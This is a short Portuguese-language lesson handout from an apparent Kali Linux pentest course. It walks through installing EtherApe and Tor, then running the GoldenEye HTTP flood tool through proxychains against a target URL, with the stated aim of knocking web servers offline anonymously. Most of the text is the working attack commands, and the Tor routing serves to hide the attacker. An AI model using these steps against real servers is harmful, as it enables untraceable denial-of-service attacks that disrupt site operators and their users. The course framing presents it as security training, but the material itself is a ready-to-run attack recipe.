Pentest com Kali Linux



Instrutor:Vitor Mazuco

http://facebook.com/vitormazuco

Email:vitor.mazuco@gmail.com

WebSite:

http://vmzsolutions.com.br

Nessa aula, vamos fazer os testes de DDoS de forma anonima com o uso de algumas ferramentas como o Tor, Proxychains, GoldenEye e EtherApe para a visualização do mapa de Redes.

Primeiro, vamos usar o EtherApe que possibilida você ter uma visão geral de sua rede, quais são as origens e destidos das

conexões e o uso de seus protocolos.

apt-get install etherape

etherape

Agora vamos instalar o Tor e usar com o Proxychains que é um pacote que possibilita criar o roteamento das requisições das suas aplicações através de *proxys* escolhidos por você e colocado em uma lista. Mas vamos usar o Tor Router que vai fazer os redirects de forma direta para o Tor. Ou seja, vamos usar os servidores do Tor para executar o Proxychains.

apt-get install tor

service tor start

- E por último, vamos usar o GoldenEye, que serve para colocar uma carga pesada em servidores HTTP, de modo a deixar off, esgotando os pools de recursos.
- # git clone https://github.com/jseidl/GoldenEye.git
- # cd GoldenEye/
- # proxychains ./goldeneye.py http://testdomain.com